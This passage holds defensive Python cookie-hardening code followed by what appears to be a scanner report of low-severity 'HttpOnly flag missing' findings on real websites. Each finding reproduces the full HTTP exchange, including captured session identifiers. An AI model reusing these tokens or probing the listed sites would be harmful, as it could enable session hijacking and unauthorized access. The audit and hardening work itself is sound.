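    name, value, attrs = parse_set_cookie(header_value)
    attrs.setdefault("httponly", "")
    if https:
        attrs.setdefault("secure", "")
    out = [f"{name}={value}"]
    for key, val in attrs.items():
        label = CANONICAL_ATTRS.get(key, key)
        out.append(f"{label}={val}" if val else label)
    return "; ".join(out)


# Header excerpts copied from this report (instances 12.100 and 13.1); bodies omitted.
MARYKAY_FAVICON = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: image/x-icon\r\n"
    "Set-Cookie: TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com\r\n"
    "Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/\r\n"
    "\r\n"
)
SPECIFICCLICK_ROOT = (
    "HTTP/1.1 200 OK\r\n"
    "Server: WebStar 1.0\r\n"
    "Set-Cookie: JSESSIONID=fb406049426234e5945296c2a152; Path=/\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for host, raw in (("www.marykay.com", MARYKAY_FAVICON), ("afe.specificclick.net", SPECIFICCLICK_ROOT)):
        for name, finding in audit_response(host, raw):
            print(f"{host} {name}: {finding}")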



13.1. http://afe.specificclick.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: afe.specificclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
X-Powered-By: JSP/2.1
Set-Cookie: JSESSIONID=fb406049426234e5945296c2a152; Path=/
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:05:55 GMT
Connection: close
Vary: Accept-Encoding



13.2. http://afe.specificclick.net/serve/v=5

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906110541 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f22ce332bb32f495908027d55

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=f45f2c4eedfe5c52c57643e800e5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:05:40 GMT
Vary: Accept-Encoding
Content-Length: 1708
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...

13.3. http://blog.harbottle.com/dm/xmlrpc.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.harbottle.com
Path:   /dm/xmlrpc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: PHPSESSID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dm/xmlrpc.php HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: PHPSESSID=e97d8a82d9152534016674330abb1139; path=/
Content-Length: 42
Connection: close
Content-Type: text/html

XML-RPC server accepts POST requests only.

13.4. http://convctr.overture.com/images/cc/cc.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://convctr.overture.com
Path:   /images/cc/cc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: SessionData. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cc/cc.gif?ver=1.0&aID=9684550200&mkt=0&ref=http%3A//www.rayalab.com/%3Fgclid%3DCMuoq_OIiasCFRligwodfwxd4w HTTP/1.1
Host: convctr.overture.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/free_sample.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT
P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA "
Pragma: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 34

GIF89a.............,...........L.;

13.5. http://data.cnbc.com/quotes

Summary

Severity:   Low
Confidence:   Firm
Host:   http://data.cnbc.com
Path:   /quotes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:05 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=1D2F47641A6DD26BE61912AD60DD5D15; Path=/
Content-Language: en
Content-Type: text/html;charset=UTF-8
Via: 1.1 aicache6
Content-Length: 128064
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...

13.6. https://forums.oracle.com/forums/adfAuthentication

Summary

Severity:   Low
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/adfAuthentication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/adfAuthentication?success_url=/main.jspa?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~5D09C635ADF7FCDB0B22A013B7D8A7E733E380B6F6B6FECC2930922D66B8A284C6CAC96F2D43EDA75D75999112956B40FF55201353C5FF03211190E58DE009348F6D3456BA825C6590982D6D5B75724AC9C814653CA5B4274DF09863BB77CA0770B13679F52272A0D1E2FE7CA3525FF488B1976FEF2DF74B823F474CB693675BC66F11D8776FC908E5FFD08D5EEEC4F5C523677FFE230719283092BCC55C29D4C61D4D7016E82800B744931F8E3DF98D4ED662639D486F749A20DED6E2B1D87CCF2068965103F4675905FB43A8DED28469B093EC4D09E6686DE6852A4B2608F1844974BE4B33DFF805A1E7EEB276CEA7
Osso-Paranoid: false
Content-Type: text/html
Content-Length: 0
Date: Tue, 06 Sep 2011 16:14:09 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums


13.7. https://forums.oracle.com/forums/category.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/category.jspa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID and BIGipServerforums_prod_pool. JSESSIONID appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/category.jspa?categoryID=18 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 123998
Date: Tue, 06 Sep 2011 16:13:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Database</title>
<meta http-equiv="content-type" content="te
...[SNIP]...

13.8. https://forums.oracle.com/forums/guestsettings!default.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/guestsettings!default.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/guestsettings!default.jspa HTTP/1.1
Host: forums.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 17:07:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Content-Length: 36286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Forum Settings</title>
<meta http-equiv="content-type" conte
...[SNIP]...

13.9. https://forums.oracle.com/forums/index.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/index.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/index.jspa?cat=1 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Content-Language: en-US
Location: https://forums.oracle.com/forums/main.jspa?categoryID=84
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:13:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
Content-Length: 246

<HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/main.jspa?categoryID=84">http://forums.oracle.com/fo
...[SNIP]...

13.10. https://forums.oracle.com/forums/login!withRedirect.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/login!withRedirect.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/login!withRedirect.jspa HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; BIGipServerforums_prod_pool=51417741.20480.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g
Content-Language: en-US
Location: https://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:14:08 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums
Content-Length: 339

<HTML><HEAD><TITLE>Redirect to http://forums.oracle.com/forums/adfAuthentication?success_url=/main.jspa?categoryID=84</TITLE></HEAD><BODY><A HREF="http://forums.oracle.com/forums/adfAuthentication?suc
...[SNIP]...

13.11. https://forums.oracle.com/forums/main.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/main.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 246459
Date: Tue, 06 Sep 2011 16:13:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Forum Home</title>
<meta http-equiv="content-type" content="
...[SNIP]...

13.12. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

Summary

Severity:   Low
Confidence:   Firm
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPC=1315341135013-154927.19&mboxPage=1315341466598-609944&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=HP_Trial_111510&mboxId=0&mboxTime=1315323466980&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315341135013-154927.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Tue, 06 Sep 2011 15:37:46 GMT
Location: http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPC=1315341135013-154927.19&mboxPage=1315341466598-609944&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=HP_Trial_111510&mboxId=0&mboxTime=1315323466980&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&mboxReferrer=&mboxVersion=40&mboxXDomainCheck=true
Set-Cookie: mboxSession=1315341135013-154927; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 06-Sep-2011 16:08:46 GMT; Path=/m2/netsuite
Content-Length: 0


13.13. http://pg.links.origin.channelintelligence.com/pages/wl.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pg.links.origin.channelintelligence.com
Path:   /pages/wl.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=163810295&nICnt=1&nDCnt=8&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098978&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=13017277_841291_8679155_13016956_48968727_11302_86109971_26080384&nRID=0&sRnd=B96Gkfc1 HTTP/1.1
Host: pg.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSTCSACR=OMFNJPGCMPJDECJINBCLIADH; serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 16:46:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96Gkfc1
Content-Length: 685
Content-Type: image/gif
Expires: Tue, 06 Sep 2011 16:45:41 GMT
Set-Cookie: sessionstamp=27545040; expires=Tue, 06-Sep-2011 17:46:40 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDQQBBATAR=PLAFJPGCOAIHIKCFGNLLPKIC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&amp;oid=19483251&amp;linkid=&amp;uid=163810295&amp;r
...[SNIP]...

13.14. http://pg.links.origin.channelintelligence.com/pages/wl.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pg.links.origin.channelintelligence.com
Path:   /pages/wl.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=48968727_26080384_8679155_11302_2271669_13016956_841291_64856419_24552604_13017277_48968727&nRID=0&sRnd=B96Gkgc1 HTTP/1.1
Host: pg.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098961
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSTCSACR=OMFNJPGCMPJDECJINBCLIADH; serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 16:46:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D48968727%5F26080384%5F8679155%5F11302%5F2271669%5F13016956%5F841291%5F64856419%5F24552604%5F13017277%5F48968727%26nRID%3D0%26sRnd%3DB96Gkgc1
Content-Length: 716
Content-Type: image/gif
Expires: Tue, 06 Sep 2011 16:45:42 GMT
Set-Cookie: sessionstamp=27545045; expires=Tue, 06-Sep-2011 17:46:42 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDSSAACRAR=JFOLFFNCAOIGHHNCKCKCPJKC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&amp;oid=19483251&amp;linkid=&amp;uid=30314234&amp;rg
...[SNIP]...

13.15. http://pg.links.origin.channelintelligence.com/pages/wl.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pg.links.origin.channelintelligence.com
Path:   /pages/wl.asp

Issue detail

